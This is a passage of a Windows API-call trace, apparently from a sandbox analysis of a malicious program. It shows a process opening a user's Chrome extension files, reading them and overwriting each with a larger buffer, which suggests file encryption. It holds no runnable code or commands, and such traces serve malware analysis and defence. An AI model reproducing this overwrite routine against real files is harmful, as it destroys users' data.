nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x690, lpOverlapped=0x0) returned 1 [0140.652] CloseHandle (hObject=0x1d8) returned 1 [0140.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.653] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.653] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xf2 [0140.653] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.653] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.653] ReleaseMutex (hMutex=0x168) returned 1 [0140.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.653] ReadFile (in: hFile=0x1d8, lpBuffer=0x2697508, nNumberOfBytesToRead=0xf2, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697508*, lpNumberOfBytesRead=0x2b1f2bc*=0xf2, lpOverlapped=0x0) returned 1 [0140.655] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.655] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x67a, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x67a, lpOverlapped=0x0) returned 1 [0140.655] CloseHandle (hObject=0x1d8) returned 1 [0140.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.656] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.656] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10c [0140.656] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.656] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.656] ReleaseMutex (hMutex=0x168) returned 1 [0140.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.657] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x10c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x10c, lpOverlapped=0x0) returned 1 [0140.658] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.658] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x694, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x694, lpOverlapped=0x0) returned 1 [0140.658] CloseHandle (hObject=0x1d8) returned 1 [0140.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.659] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.659] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10b [0140.659] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.660] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0140.660] ReleaseMutex (hMutex=0x168) returned 1 [0140.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0140.660] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x10b, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x10b, lpOverlapped=0x0) returned 1 [0140.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0140.661] WriteFile (in: hFile=0x1d8, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x693, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x693, lpOverlapped=0x0) returned 1 [0140.662] CloseHandle (hObject=0x1d8) returned 1 [0140.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0140.662] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.663] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb3 [0140.663] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0140.663] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.009] ReleaseMutex (hMutex=0x168) returned 1 [0141.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.209] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0141.234] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.234] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0141.235] CloseHandle (hObject=0x1d8) returned 1 [0141.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.235] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.236] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb3 [0141.236] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.236] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.236] ReleaseMutex (hMutex=0x168) returned 1 [0141.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.236] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0141.237] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.237] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0141.237] CloseHandle (hObject=0x1d8) returned 1 [0141.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.238] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.257] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb3 [0141.257] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.257] ReleaseMutex (hMutex=0x168) returned 1 [0141.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.257] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0141.258] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.258] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0141.259] CloseHandle (hObject=0x1d8) returned 1 [0141.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.275] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.275] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb3 [0141.275] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.275] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.275] ReleaseMutex (hMutex=0x168) returned 1 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.276] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0141.277] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.277] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0141.278] CloseHandle (hObject=0x1d8) returned 1 [0141.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.279] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.279] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb3 [0141.279] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.279] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.279] ReleaseMutex (hMutex=0x168) returned 1 [0141.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.280] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35ad8, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35ad8*, lpNumberOfBytesRead=0x2b1f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0141.281] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.281] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0141.281] CloseHandle (hObject=0x1d8) returned 1 [0141.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2d6 [0141.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.283] ReleaseMutex (hMutex=0x168) returned 1 [0141.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="manifest.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="manifest.json", lpUsedDefaultChar=0x0) returned 13 [0141.283] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x2d6, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x2b1f2bc*=0x2d6, lpOverlapped=0x0) returned 1 [0141.285] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0141.285] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x85e, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x85e, lpOverlapped=0x0) returned 1 [0141.285] CloseHandle (hObject=0x1d8) returned 1 [0141.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0141.286] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.286] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd5 [0141.286] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0141.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.286] ReleaseMutex (hMutex=0x168) returned 1 [0141.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0141.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0141.286] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, 